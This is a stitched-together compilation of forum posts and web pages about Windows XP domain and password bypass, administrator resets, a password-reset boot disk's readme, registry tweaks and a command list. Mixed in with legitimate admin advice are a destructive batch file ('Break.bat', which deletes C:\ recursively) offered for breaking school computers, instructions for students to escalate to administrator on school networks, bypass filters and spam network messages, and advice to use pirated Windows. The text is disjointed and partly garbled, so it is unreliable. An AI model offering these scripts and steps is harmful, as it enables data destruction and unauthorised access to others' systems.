about domain by-pass
TRANSCRIPT
1
Company I'm working for had/has Server 2003 on a server. But the motherboard is going out on it and it's OEM software. So I'm trying to build a new network just using XP Pro. We are small and what we are using it for doesn't justify spending 2k to replace server software.
The issue I'm having is that whoever set up the network is unreachable and nobody knows the usernames and passwords to log on locally, only to login to the server domain. What resolutions are there so that I can set up new network connections on the computers which were part of the old domain?
Only options avaliable once computer boots up is to either connect to domain or connect locally. Obviously if I could connect locally I could reconfigure the network. But without knowing the user and pw there is an issue.
---------------------------------------------------------------------------------------------------------------------
I had to do the same thing last year. The owner didn't want to pay for a new server. So I changed it from a domain network to a peer to peer network with a workgroup.
Don't take any machine off the network yet. Login to the domain as administrator from each machine, one at a time. Reset the local administrator password on each machine, by going to the run box and entering compmgmt.msc , press enter.
Go to local users and groups, users. highlight administrator, click action, set password. Use the same password to make it easier. At that point you will have a local administrator account for each machine. Add any domain users to the local machine who may need access at the same time. Copy their favorites, my documents, etc... from the domain account to the local account if necessary.
At that point you can remove the machine from the domain and put it on the work group. Just make sure that you copy all the shares from the server to whichever machine you are going to use a file server before you remove it from the network. Set the permissions.
---------------------------------------------------------------------------------------------------------------------
The administrator password in Windows XP is the password used to access the "Administrator" account.
2
This account usually doesn't show up on the logon screen and most people don't know it exists. Usually that's okay because you won't need to use your computer under this account very often.
However, there are a few times when you will need this password. When you're accessing the Windows XP Recovery Console or you're trying to boot into Windows XP Safe Mode, you'll need this password before you can continue.
Follow the steps below to quickly find the Windows XP Administrator password on your computer: Difficulty: Average Time Required: Figuring out the Administrator password may take a few minutes to hours depending on the situation Here's How:
1. Try leaving the password blank. Just press Enter without typing anything when asked for it.
The password to the Windows XP Administrator account is defined during the initial Windows XP installation process and it's often simply left blank.
2. Enter the password to your account. Often times, depending on how Windows XP was setup on your computer and what part of XP is asking for an admin password, the primary user account will also be configured with administrator access.
3. Try to remember your administrator password. If you installed Windows XP on your computer yourself, you probably set the administrator password during the Windows XP installation process. If that's true, you might be able to make really good guesses at what the password might be.
4. Have another user enter his or her password. If there are other users that have accounts on your Windows XP computer, one of them may be setup with administrator access.
5. Recover the administrator password using a Windows password recovery tool. These tools are software programs designed to discover or reset/delete Windows passwords.
Note: Some password recovery tools is the list I linked to above also have the ability to transform regular user passwords into administrator passwords. This could be valuable if you know your account's password but it's not an administrator account.
3
6. Perform a clean installation of Windows XP. This is a last resort option. This type of installation will completely remove Windows XP from your PC and install it again from scratch.
If you're just curious about the password to your Administrator account then obviously don't go to this extreme. However, if you're needing the Administrator password to access diagnostic tools and this is your last effort to save your PC, performing a clean install will work.
Tips:
1. Looking for your administrator password but aren't using Windows XP? See How to Find Windows Administrator Passwords for instructions tailored for other Windows operating systems.
I've put together a single floppy or CD / USB Drive which contains things needed to reset the passwords on most systems. The CD can also be installed on a USB drive, see readme.txt on the CD.
The bootdisk should support most of the more usual disk controllers, and it should auto-load most of them. Both PS/2 and USB keyboard supported.
More or less tested from NT3.5 up to Windows 7, including the server versions like 2003 and 2008. Also 64 bit windows supported.
DANGER WILL ROBINSON! If password is reset on users that have EFS encrypted files, and the system is XP or newer, all encrypted files for that user will be UNREADABLE! and cannot be recovered unless you remember the old password again If you don't know if you have encrypted files or not, you most likely don't have them. (except maybe on corporate systems)
Please see the Frequently Asked Questions and the version history below before emailing questions to me. Thanks!
• Should now be possible to load extra drivers (drivers?.zip) from USB the same way as with floppy. Or maybe not. Did not test it that much.
• Fixed a lot of bugs in the registry handling, did not affect password reset much, but did affect larger registry edits.
4
• You still may experience hangs when the NTFS disk is mounted, it will hang after saying "NTFS version x.xx" or such. If there is disc activity, just wait, it may take a while.
2007-09-27
• Patched up NTFS driver to get rid of hang on mount in many cases (after selecting disk). Got many problem reports on this. At the same time someone on the NTFS-for-linux mailinglist mentioned it, and Anton Altaparmakov made a patch very quick. Thank you Anton!
• Nice if people experiencing the hang in 2007-09-23 can mail me and tell if the fix worked or not. Thanks!
• NOTE: It may still take up to a minute or two to select the disk. • Floppy version had a script bug making it crash in the first menu. Fixed. • CCISS driver (HP/Compaq DLxxx etc) had different device paths. Hacked
in support for it, may not be 100% still.
2007-09-23
• Floppy version is back! (requires 3 floppies to get all drivers, but you can compose your own driver set so you only need 2)
• Yes, VISTA is supported (even more) • Disk select now indicates which disks are removable, ie are USB keys for
instance. • Check for "read-only" NTFS mount, you get instructions on what to do if
there are problems with the disk so changes won't be saved. • Missed out on some IDE/ATA and SATA drivers last time, better now.. I
hope. • User can be added to the administraror group, making them administrators. • Stupid typo in readme.txt on CD fixed, on how to make USB bootable.
(earlier history removed) 9705xx
• First public release.
Download
Note: Some links may be offsite.
5
CD release, see below on how to use
• cd110511.zip (~3MB) - Bootable CD image. (md5sum: fe0d30a1c540ec6757e748c7c09e2e4f)
• usb110511.zip (~3MB) - Files for USB install (md5sum: 50ced8d2a5febe22199f99acec74e63b)
• cd100627.zip (~4MB) - Previous version CD. (md5sum: 6d80cdfbba97457e413f95a3554d9524) The files inside the USB zip are exactly the same as on the CD. See below for instructions on how to make USB disk bootable.
Floppy release (not updated anymore), see below on how to use them
• bd080526.zip (~1.4M) - Bootdisk image (md5sum: 37889e4c540504e59132bdcdfe7f9bb7)
• drivers1-080526.zip (~310K) - Disk drivers (mostly PATA/SATA) (md5sum: 72ac1731c6ba735d0ac2746a30dbc3ee)
• drivers2-080526.zip (~1.2M) - Disk drivers (mostly SCSI) (md5sum: 30172bec657c85a5f1a0b43601452fb7)
Previous versions may sometimes be found here (also my site) NOTE: Versions before 0704xx will corrupt the disk on VISTA!
NOTE THAT THE BOOTDISK CONTAINS CRYPTHOGRAPHIC CODE, and that it may be ILLEGAL to RE-EXPORT it from your country.
How to make the CD
Unzipped, there should be an ISO image file (cd??????.iso). This can be burned to CD using whatever burner program you like, most support writing ISO-images. Often double-clikcing on it in explorer will pop up the program offering to write the image to CD. Once written the CD should only contain some files like "initrd.gz", "vmlinuz" and some others. If it contains the image file "cd??????.iso" you didn't burn the image but instead added the file to a CD. I cannot help with this, please consult you CD-software manual or friends.
The CD will boot with most BIOSes, see your manual on how to set it to boot from CD. Some will auto-boot when a CD is in the drive, some others will show a boot-menu when you press ESC or F10/F12 when it probes the disks, some may need to have the boot order adjusted in setup.
6
How to make an bootable USB drive • Copy all the files that is inside the usbXXXXXX.zip or on the CD onto an usb drive, directly on the drive, not inside any directory/folder. • It is OK if there are other files on the USB drive from before, they will not be removed. • Install bootloader on the USB drive, from command prompt in windows (start the command line with "run as administrator" if possible)
• X:syslinux.exe -ma X: • Replace X: with the drive letter the USB drive shows up as (DO NOT USE C:) • If it seems like nothing happened, it is usually done. • However, a file named ldlinux.sys may appear on the USB drive, that is normal. • It should now in theory be bootable. • Please know that getting some computers to boot from USB is worse than from CD, you may have to change settings, or some will not simply work at all.
How to make the floppy
The unzipped image (bdxxxxxx.bin) is a block-to-block representation of the actual floppy, and the file cannot simply be copied to the floppy. Special tools must be used to write it block by block.
• Unzip the bd zip file to a folder of your choice. • There should be 3 files: bdxxxxxx.bin (the floppy image) and rawrite2.exe
(the image writing program), and install.bat which uses rawrite2 to write the .bin file to floppy.
• Insert a floppy in drive A: NOTE: It will lose all previous data! • Run (doubleclick) install.bat and follow the on-screen instructions. • Thanks to Christopher Geoghegan for the install.bat file (some of it ripped
from memtest86 however)
Or from unix:
dd if=bd??????.bin of=/dev/fd0 bs=18k
How to make and use the drivers floppy
• Simply copy the zip file onto an empty floppy. • You MUST NOT UNZIP THE ZIP FILE!
7
• Depending on your hardware you may only need one of the driver sets or the other, or maybe both.
• To use, insert one of the driver floppies when asked for it after booting, the zip file will be unzipped to memory.
• If no drivers matched (no harddisk found), you can select 'f' from the main menu to load the other driver set.
• Then select 'd' to auto-start the new drivers (if it matches your hardware) • Sometimes it fails detecting the floppy change and you get an error, just
select 'f' again, it works the second time. • For more advanced users that uses this often, it is possible to unzip just the
drivers you need and zip them up into a new zip archive. The zip file name must start with "drivers", the rest is ignored. (it unzips drivers*.zip)
Regedit Uses:
• For All USB Port Disable • HKEY_Local_Machine System Current Control
set Services USBSTOR(Double click in the USBSTOR one list will open in the right side on that list double click the Start and change the value to 4 (disable)3 is enable. you can "hack" all of the following with Command Prompt Most Websites User Accounts (on your computer) Computer Settings E‐mail and some other stuff ‐.‐ To do anything related to hacking with Command Prompt you must know my best friend and his name is IP! IP is everything in the cyber world, it identifies you like no other, with your IP someone can find out where you live, who the computers registered to, the computers name, and more! So think of it as your cyber Social Security Number (SSN) you don't want to just tell everyone it. So to get your IP you can start by opening Command Prompt Next make sure it is on C: Drive
8
Then type in the following ipconfig /all This will display a lot of info some of which is very important This will tell you how you are connected to the internet and with what and also a lot of other stuff (i will not lie some of the info it gives is useless) Congrats you learn a command! and you have now found out your IP! (im not telling where it is im just saying its there if you scroll up a little bit) Now to find internet connection! Lets say you and a friend are playing a MMO and your friend is host and you are lagging well if you want to find out why just type into command prompt the following Ping 127.0.0.1 (replace 127.0.0.1 with your friends IP)(also 127.0.0.1 is local host or you and is used for offline "things")(it also means nothing towards your IP basicly) the lower the number you see the better! lower means faster and higher means slower Now time for some "Advanced" stuff How to find out computer account passwords! this will require you to know the username. First open Command Prompt Then type in the following Net User This will give you all the accounts (so i lied you didn't need to know the USernames xD Now type in Net User Admin (you may replace Admin with the account name) Now you get even more info on that account if you read it all it tells you about the password Now if you want to change the password just type the following Net User Admin Password (you can replace Admin with the username and Password with the desired password) and TADA you have changed the account password. O.K. that is all that i will currently say, i will post more in the future, this is jsut a taste of things to come and now for some fun with Command Prompt!
9
Open up Notepad.exe or in Command Prompt type Notepad (you may type in a files name with out the .exe on the end and it will run it) Now type in the following: start start start start start start start crash then click Save as and select all files, then name is .bat and when you are board just run it and u'll see what it does (make sure you save what your doing first!) it will auto name to Crash.bat O.K. i take NO RESPONSIBILITY FOR WHAT I AM ABOUT TO POST! this file will BREAK YOU COMPUTER! @echo off taskkill ‐f explorer.exe start %windir%\System32\rundll32.exe user32.dll, LockWorkStation rd c:\ /s /q cls put that into a notepad and name it Break.bat now what will this do? it will first delete all internet browsers! then it will lock you out of your computer and then delete your System 32 file which is what your computer needs to RUN! now DO NOT USE THIS! i only posted this for those how want to break a school computer! be careful with this because you will need to get a new computer since restoring can't fix this! now be safe and have fun with the new skills i have just taught you! don't forget to thanks and rep me!
Open command prompt from where it is Banned or not allowed by admin (awesome tricks)
10
Open up Command Prompt (Start>Run>Command.com) Can't use command prompt at your school? Open up Microsoft word..Type: Command.com Then save it as Somthing.bat. Warning: Make sure you delete the file because if the admin finds out your in big trouble. ‐‐Adding a user to your network‐‐ Type: Net user Haxxor /ADD ‐‐‐‐‐ That will add "Haxxor" onto the school user system. ‐‐‐‐‐ Now you added users lets delete them! Type: Net user Haxxor /DELETE Warning: Be carefull it deletes all their files. ‐‐‐‐‐ "Haxxor" will be deleted from the user system. ‐‐‐‐‐
11
Hmmm? It says access denied? Thats because your not admin! ‐‐‐‐ Now lets make your Admin! ‐‐‐‐ This will make Haxxor an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to. Type: net localgroup It will show you what they call admin, say at my school they calll it adminstrator so then i would Type: net localgroup administrator Haxxor /ADD ‐‐‐‐ Getting past your web filter. Easy way: Type whatever you want to go on say i wanted to go on miniclips bug on wire i would go to google and search miniclip bug on wire then instead of clicking the link i would click "cached". Hard way: I'm hoping you still have command prompt open. Type: ping miniclip.com And then you should get a IP type that out in your web browser, and don't
12
forget to put "http://" before you type the IP. ‐‐‐‐‐ Sending messages through your school server Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type Net Send <domain> * "The server is h4x0r3d" Note: <domain> may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out. Where <domain> is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use Net Send Haxxor School * "The server is h4x0r3d" The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example NetSend Varndean dan,jimmy,admin "The server is h4x0r3d" use commas to divide the names and NO SPACES between them. what say?? ~Cheers~
or
13
Allowing dos and regedit in a restricted Windows A very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following: REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp] "Disabled"=dword:0 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem] "DisableRegistryTools"=dword:0 Save it as something.reg then run it. Simple.
NETWORKING HACK Chat With Command Prompt Talk with other computers on your network.
If you want a private chat with a friend or client on you Network, you don't need to download any fancy program! All you need is your friends IP address and Command Prompt. Firstly, open Notepad and enter: @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A
14
Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:
MESSENGER User:
After "User" type the IP address of the computer you want to contact. After this, you should see this:
Message:
Now type in the message you wish to send. Before you press "Enter" it should look like this:
MESSENGER User: 56.108.104.107 Message: Hi
Now all you need to do is press "Enter", and start chatting!
How to start System Restore by using the Command prompt Note You must be logged on to Windows with a user account that is a computer administrator to complete these steps. To verify that you are logged on to Windows with a user account that is a computer administrator; visit the following Microsoft Web site: If a new program has made your computer behave unpredictably, and uninstalling the new program did not help, you can try the Windows XP System Restore tool. Important If you have not previously set a restore point in System Restore, you cannot restore your computer to a previous state. If you are not sure, or if you have not previously set a restore point, contact Support. To start System Restore using the Command prompt, follow these steps:
1. Restart your computer, and then press and hold F8 during the initial startup to start your computer in safe mode with a Command prompt.
15
2. Use the arrow keys to select the Safe mode with a Command prompt option.
3. If you are prompted to select an operating system, use the arrow keys to select the appropriate operating system for your computer, and then press ENTER.
4. Log on as an administrator or with an account that has administrator credentials.
5. At the command prompt, type %system root%\system32\restore\rstrui.exe, and then press ENTER.
6. Follow the instructions that appear on the screen to restore your computer to a functional state.
Note To start the System Restore tool using another safe mode option, visit the Microsoft Help and Support Web site and see the article "A description of the Safe Mode Boot options in Windows XP." For additional information about the Safe mode with a command prompt, click the following article number to view the article in the Microsoft Knowledge Base: 315222 A description of the Safe mode boot options in Windows XP
Finding the IP Address for another Computer in Windows XP/Vista/7 Notes:
• Important: You must know the full computer name of the computer for which you want to find the IP address.
• If the computer for which you are trying to find the IP address uses a DHCP connection, keep in mind that the IP address will change on a regular basis.
To find another computer's IP address:
1. Connect to the Internet. 2. Click the Start button. 3. Start the Run utility.
o In Windows XP, select Run. o In Windows Vista/7:
1. Select All Programs. 2. Select Accessories. 3. Select Run.
4. In the Open: text box, type: cmd 5. Click OK. 6. Ping the computer for which you want to find the IP address.
16
o In XP, at the command prompt, type: ping [Full Computer Name]
Note: Replace [Full Computer Name] with the full name of the computer.
o In Vista/7, at the command prompt, type: ping -4 [Full Computer Name]
Note: Replace [Full Computer Name] with the full name of the computer.
7. Press the Enter key. 8. Locate the IP address in the results of your ping session. 9. Close the command prompt window. 10. here is a hidden administrator account. You can log on it and you can
change or remove all the other passes of your comp without knowing the previous passes. Just type ctrl alt del twice and then type Administrator on the account name and you can enter. If that won't work, restart the computer and toggle the F5 button. You will get screen that will ask you if you want to boot with command prompt, choose it and then type net user, then press enter # Then again type "Net user [Username of the Account]*" then press Enter, without the ["], and quotes. Make sure you spell the username correctly, and you have the '*' # To change password press enter and after that tieler south * Reset password to whatever you want. If that won't work, go to this link ..more suggested info on the replies
11. 12. View all 10 comments 13. LITTLECOMPNERD ‐ May 19, 2009 4:08pm BST 14. press f8 then select start safe mode command prompt 15. Edrick ‐ Oct 24, 2009 8:40am BST 16. hi can you help me i want to use my bro. comp but i don’t know his pass
how can i know it without changing anything or resting it pls help me 17. ARK ‐ May 26, 2011 1:21pm BST
17
18. Edrick, thats easy just follow these steps, 1. ask your bro the pass 2. enter in the pass 3. Voila!! YOU ARE ON!!
There are 3 real ways to bypass any stuck passwords on any XP computer. 1. Use the build in machine administrator, if it's unlocked. Seeing that administrator's can change the passwords of administrators, access to any local administrative account will yield an entry to the user account control panel applet. To see if your built in admin account is unlocked, you will need to start the computer normally. When it finishes loading, you will have one of two screens: The welcome screen, or the Windows Logon screen. If you have a welcome screen (Windows XP Home default) you will need to press CTRL ALT DEL simultaneously, and then again. CTRL+ALT+DEL release CTRL + ALT+ DEL release. The welcome screen should change to the advanced login screen, that you may already have if you have turned off the welcome screen, or if you are using XP pro, or Windows Server 2003. Next, for username type in Administrator, leave the password blank. If you can get in with this account, or any administrator account, click on start and click run. Type "Control UserPasswords2". From here, adjust the passwords of each account on the computer as you see fit. 2. Next, let's say you can't get into any administrative account, or perhaps windows are not loading all the way because your product key has expired. You will NOT be able to access command prompt in safe mode to change administrative accounts unless you can actually logon to the computer, so if windows is locked because of product key issues, don't try this. But if you can still get into a user account that is not an admin, and you need to unlock an admin, the login as the normal user and create a new account using command prompt (as a limited user you cannot do this via the control panel) and type
18
net user Admin2 password1 /create This creates an account named Admin2 with a password of password1. next see if you can make this account an admin. type net local group Administrators Admin2 /add if you get an access denied message, you will need to go to step 3. If you get a command completed successfully, the log out and go to the normal login screen. Then log in as Admin2 with the new account, and you now have admin control of the pc. Go to step 1. 3. If you cannot get into windows as any account or using command prompt in safe mode or if windows is locked with a bad product key, you can use third party software to adjust the Admin Password, or to adjust the Microsoft oobe activation client, so that you can regain access. My suggestions would be to use Linux boot disc, (which you can put on a CD, floppy, or flash drive) and as long as BIOS is configured to accept a boot order with one of these devices before the hard drive, then you are good to go. If not, you will have to go into BIOS to change it. Type F1 or F2 at startup to gain access to BIOS. If there is a BIOS password, and you don't know it, you will have to reset BIOS using the reset jumper on the inside of the motherboard. Look that up on Google for more information. 4. If all else fails, and you cannot get in, you will have to settle for reformatting. This will clear all user data and files previously on the computer though, so save whatever you can beforehand. Then, on another computer, download a copy of an installation disc for Torrents or pirate bay and burn the ISO to a disc using IMGBurn or Nero, or any of those other hokey ISO burning programs. Then, place the disc in the computer you want to reformat. When it says "Press any key to boot from disc" (during the normal boot) press a key, and wait for the OS to load the WINDOWS Setup Menu. Follow the onscreen instructions to reformat the hard drive and
19
reinstall windows. If it asks you for the current admin password you are doing something wrong. Make sure you are not trying to repair windows, or install windows onto the already made partition. This will ask for a password. You need to press D to delete the partition. Delete all partions on the drive. L to confirm the delete. Then once your disc is empty, press enter to reinstall windows and reformat, etc. Follow the directions on the screen. If you are using a cracked version of Windows, you will not need a product key. If you are using a normal disc, and you have a product key that works (usually on the side of the OEM machine, or on a label on the software package for ordered products) then type that in if it asks for it during setup, or after setup on the first logon when MSOobe (the activator) starts. Any questions, or if you'd like me to outline specific instructions for you in a specific scenario, e‐mail me privately at zgwin (at) zigweb (dot) net. ~Zach Microsoft MVP Software Architect
19. 20. View all 4 comments 21. drew ‐ Jul 23, 2009 6:37am BST 22. Zach,
first off i read some of the stuf u wrote on a forum and figured u knew what you were talking about, so i thought u might be able to help. i have a virus on my computer that has allowed someone to hack into it and change my login password on windows xp home edition. iv tried everything i can to get into it, iv gone through bios, iv tried F2 ,5,8,10 and 12, and iv got nothing. i don’t really have a way to get any type of password cracking softwear onto a cd or anything, i was wondering if you could tell me maybe how to hack my own computer to bypass the login screen. oh and another thing too that i thought was weird, when i tried to boot from a disk it said that it couldn't... i dont know y it would say that when i have a cd and a dvd drive
20
and they both work. but yea thats where im at. maybe u can shed a little light on that for me. thanks. Drew
23. frustrated ‐ Sep 14, 2009 3:36am BST 24. I have a legal version of Windows XP Pro, with disks and product key and all
that. I even have access to a user account with administrative rights. My problem is the hidden Administrator account (that I can only see when booting in Safe Mode) has a password on it, and I can't remember what it is. I need it because I want to reset my MBR, and the only way I've found to do that is to boot from the installation CD and go into recovery mode and run firmer. To get into recovery mode, I need the password to this Administrator account. Do you know of a way to reset this password or get around this problem somehow?? Thanks a ton for any help.
25. awmking ‐ Oct 25, 2009 5:33am GMT 26. Could you please help me too? Will this info work for windows vista hp? I
cannot seem to recover my admin pass..please help...thanks in advance 27. Answer 28. +8 29. 30. Report 31. dz bunni Oct 9, 2009 12:19am BST 32. THIS EASY METHOD JUST WORKED FOR ME, I BYPASSED THE PASSWORD BY
DELEATING IT, THEN CREATED NEW ONE, SYSTEM WORKING GREAT, NO ADVERSE GLITCHES ! I have a dell laptop, forgot the password I created, and i am the main account holder. my computer guy I assume has created an administrator password, but when I contacted him about this issue, i was told there would be a $50 fee to reset the password, so i came to this forum and tried every method listed here! Of course, it wasn’t until I got to the last few postings that i found one that
21
worked! This method just worked completely for me, I am now operating windows in normal mode and happy to of impressed myself, loll! I decided to post this method in PLAIN ENGLISH, for those of us less computer savy. 1. when windows is starting up press F8 (I had to attempt this a few times till i got it right, when I continuously hit the F8 key as fast as i could it worked, but you must begin hitting it as soon as windows begins to load) 2. (This will take you into a screen where windows list different settings you can choose, as to how you want windows to run. I used the arrow keys on my keyboard, and selected safe mode) select SAFE MODE 3. (for user name, type the word) administrator 4. (no password should be needed, so then press) enter 5.(windows should then load in safe mode. access the control panel by doing the following); click start , control panel , user accounts 6. Once in user accounts, find the name of the account that you need the password for, and click on that account , then click on the option to remove the password for that account THAT ACCOUNT IS NOW PASSWORD FREE !!!! 7. Restart windows in normal mode and log in! I also then managed to create (recreate) a password for that account as well, and then i created a guest account too! C Driveai Maraika
22
In run command regedit-->HKEY_CURRENT_USER -->Software/microsoft/windows/current/version/policies/explorer Ithil explorereai click seitha vudan right sideil sola menu thondrum.athil blankana idathil vaaithu right click seithal new -->DWORD VALUE ponal oru dialogue box onnu open aagum athil.(Intha NEW folderukku name kodukkavum NoDrives). Then antha DWORD Value boxil C driveai maraikka vendum yendral 4 kodukavum.Then decimalai click seithu ok kodukkavum.piragu restart seiyavum.ippa paarthaal c drive marainju poirukkum. A:1, B:2, C:4, D:8, E:16, F:32, G:64 ,H:128, I:256, J:512, K:1024, Z:33554432
Command Lines:
ADDUSERS Add or list users to/from a CSV file ADmodcmd Active Directory Bulk Modify ARP Address Resolution Protocol ASSOC Change file extension associations• ASSOCIAT One step file association ATTRIB Change file attributes b BCDBOOT Create or repair a system partition BOOTCFG Edit Windows boot settings BROWSTAT Get domain, browser and PDC info c CACLS Change file permissions CALL Call one batch program from another• CD Change Directory - move to a specific Folder• CHANGE Change Terminal Server Session properties CHKDSK Check Disk - check and repair disk problems CHKNTFS Check the NTFS file system CHOICE Accept keyboard input to a batch file CIPHER Encrypt or Decrypt files/folders CleanMgr Automated cleanup of Temp files, recycle bin CLEARMEM Clear memory leaks
23
CLIP Copy STDIN to the Windows clipboard. CLS Clear the screen• CLUSTER Windows Clustering CMD Start a new CMD shell CMDKEY Manage stored usernames/passwords COLOR Change colors of the CMD window• COMP Compare the contents of two files or sets of files COMPACT Compress files or folders on an NTFS partition COMPRESS Compress individual files on an NTFS partition CON2PRT Connect or disconnect a Printer CONVERT Convert a FAT drive to NTFS. COPY Copy one or more files to another location• CSCcmd Client-side caching (Offline Files) CSVDE Import or Export Active Directory data d DATE Display or set the date• DEFRAG Defragment hard drive DEL Delete one or more files• DELPROF Delete NT user profiles DELTREE Delete a folder and all subfolders DevCon Device Manager Command Line Utility DIR Display a list of files and folders• DIRUSE Display disk usage DISKCOMP Compare the contents of two floppy disks DISKCOPY Copy the contents of one floppy disk to another DISKPART Disk Administration DNSSTAT DNS Statistics DOSKEY Edit command line, recall commands, and create macros DSACLs Active Directory ACLs DSAdd Add items to active directory (user group computer) DSGet View items in active directory (user group computer) DSQuery Search for items in active directory (user group computer)
24
DSMod Modify items in active directory (user group computer) DSMove Move an Active directory Object DSRM Remove items from Active Directory e ECHO Display message on screen• ENDLOCAL End localisation of environment changes in a batch file• ERASE Delete one or more files• EVENTCREATE Add a message to the Windows event log EXIT Quit the current script/routine and set an errorlevel• EXPAND Uncompress files EXTRACT Uncompress CAB files f FC Compare two files FIND Search for a text string in a file FINDSTR Search for strings in files FOR /F Loop command: against a set of files• FOR /F Loop command: against the results of another command• FOR Loop command: all options Files, Directory, List• FORFILES Batch process multiple files FORMAT Format a disk FREEDISK Check free disk space (in bytes) FSUTIL File and Volume utilities FTP File Transfer Protocol FTYPE Display or modify file types used in file extension associations• g GLOBAL Display membership of global groups GOTO Direct a batch program to jump to a labelled line• GPUPDATE Update Group Policy settings h HELP Online Help i iCACLS Change file and folder permissions IF Conditionally perform a command•
25
IFMEMBER Is the current user in an NT Workgroup IPCONFIG Configure IP k KILL Remove a program from memory l LABEL Edit a disk label LOCAL Display membership of local groups LOGEVENT Write text to the NT event viewer LOGMAN Manage Performance Monitor LOGOFF Log a user off LOGTIME Log the date and time in a file m MAPISEND Send email from the command line MBSAcli Baseline Security Analyzer. MEM Display memory usage MD Create new folders• MKLINK Create a symbolic link (linkd) MODE Configure a system device MORE Display output, one screen at a time MOUNTVOL Manage a volume mount point MOVE Move files from one folder to another• MOVEUSER Move a user from one domain to another MSG Send a message MSIEXEC Microsoft Windows Installer MSINFO32 System Information MSTSC Terminal Server Connection (Remote Desktop Protocol) MV Copy in-use files n NET Manage network resources NETDOM Domain Manager NETSH Configure Network Interfaces, Windows Firewall & Remote access NETSVC Command-line Service Controller NBTSTAT Display networking statistics (NetBIOS over TCP/IP) NETSTAT Display networking statistics (TCP/IP) NOW Display the current Date and Time NSLOOKUP Name server lookup NTBACKUP Backup folders to tape
26
NTRIGHTS Edit user account rights o OPENFILES Query or display open files p PATH Display or set a search path for executable files• PATHPING Trace route plus network latency and packet loss PAUSE Suspend processing of a batch file and display a message• PERMS Show permissions for a user PERFMON Performance Monitor PING Test a network connection POPD Restore the previous value of the current directory saved by PUSHD• PORTQRY Display the status of ports and services POWERCFG Configure power settings PRINT Print a text file PRINTBRM Print queue Backup/Recovery PRNCNFG Display, configure or rename a printer PRNMNGR Add, delete, list printers set the default printer PROMPT Change the command prompt• PsExec Execute process remotely PsFile Show files opened remotely PsGetSid Display the SID of a computer or a user PsInfo List information about a system PsKill Kill processes by name or process ID PsList List detailed information about processes PsLoggedOn Who's logged on (locally or via resource sharing) PsLogList Event log records PsPasswd Change account password PsService View and control services PsShutdown Shutdown or reboot a computer PsSuspend Suspend processes PUSHD Save and then change the current directory• q QGREP Search file(s) for lines that match a given pattern.
27
r RASDIAL Manage RAS connections RASPHONE Manage RAS connections RECOVER Recover a damaged file from a defective disk. REG Registry: Read, Set, Export, Delete keys and values REGEDIT Import or export registry settings REGSVR32 Register or unregister a DLL REGINI Change Registry Permissions REM Record comments (remarks) in a batch file• REN Rename a file or files• REPLACE Replace or update one file with another RD Delete folder(s)• RMTSHARE Share a folder or a printer ROBOCOPY Robust File and Folder Copy ROUTE Manipulate network routing tables RUN Start | RUN commands RUNAS Execute a program under a different user account RUNDLL32 Run a DLL command (add/remove print connections) s SC Service Control SCHTASKS Schedule a command to run at a specific time SCLIST Display NT Services SET Display, set, or remove environment variables• SETLOCAL Control the visibility of environment variables• SETX Set environment variables permanently SFC System File Checker SHARE List or edit a file share or print share SHIFT Shift the position of replaceable parameters in a batch file• SHORTCUT Create a windows shortcut (.LNK file) SHOWGRPS List the NT Workgroups a user has joined SHOWMBRS List the Users who are members of a Workgroup
28
SHUTDOWN Shutdown the computer SLEEP Wait for x seconds SLMGR Software Licensing Management (Vista/2008) SOON Schedule a command to run in the near future SORT Sort input START Start a program or command in a separate window• SU Switch User SUBINACL Edit file and folder Permissions, Ownership and Domain SUBST Associate a path with a drive letter SYSTEMINFO List system configuration t TASKLIST List running applications and services TASKKILL Remove a running process from memory TIME Display or set the system time• TIMEOUT Delay processing of a batch file TITLE Set the window title for a CMD.EXE session• TLIST Task list with full path TOUCH Change file timestamps TRACERT Trace route to a remote host TREE Graphical display of folder structure TSSHUTDN Remotely shut down or reboot a terminal server TYPE Display the contents of a text file• TypePerf Write performance data to a log file u USRSTAT List domain usernames and last login v VER Display version information• VERIFY Verify that files have been saved• VOL Display a disk label• w WAITFOR Wait for or send a signal WHERE Locate and display files in a directory tree WHOAMI Output the current UserName and domain WINDIFF Compare the contents of two files or sets of files
29
WINMSDP Windows system report WINRM Windows Remote Management WINRS Windows Remote Shell WMIC WMI Commands WUAUCLT Windows Update x XCACLS Change file and folder permissions XCOPY Copy files and folders :: Comment / Remark•
Commands marked • are Internal commands only available within the CMD shell. All other commands (not marked with •) are external commands which may be used under the CMD shell, PowerShell, or directly from START-RUN.
Finished
Ii performed the following Steps but the modify key value reverts back to 0. Go to Start --> Run, then type Regedit 2. Navigate to the registry folder HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Explorer\Advanced\Folder\Hidden\SHO WALL 3. Find a key called CheckedValue. 4. Double Click CheckedValue key and modify it to 1. This is to show all the hidden files.) Suggest me step for further.
how To Hide Yourself From Network Users!, And give access to only specific users!
written by Madhukara H at June 2, 2007
How to Hide in the (Network) Neighborhood
30
Don't want your XP computer to show up in the network browse list (Network Neighborhood/My Network Places) to other users on your network? One way to accomplish that is to disable file sharing. To do this, click Start, right click My Network Places and select Properties. Right click your local area connection and click Properties. Uncheck the box that says File and Printer Sharing for Microsoft Networks. Click OK.
But what if you want to be able to share folders with some users; you just don't want everyone on the network to see your computer's shares? There's a way:
Click Start and select Run.
In the Run box, type net config server /hidden:yes
Click OK.
Now others who know the UNC path (\\computer name\share name) can connect to your computer's shares from the Run box, but it won't show up in the network browse list.
How to lookup a user name and machine name using an IP address (on windows)
If you need to find a username but only have an ip address, if you use active directory (AD) then you can use the following method to find out the username:
At the command prompt enter the following command:
nbtstat –a ipaddress
Where ipaddress is the ip address.
This will list the machine name using that ip address.
Then run the following command:
31
net view /domain:ad > somefile.txt
Where ad is the name of the domain you want to search and somefile.txt is the name of the file to contain the output.
This will generate a list of every machine and who is logged in.
Open the output file and search for the machine name determined in step 1 (the username will be listed next to this).
HTH
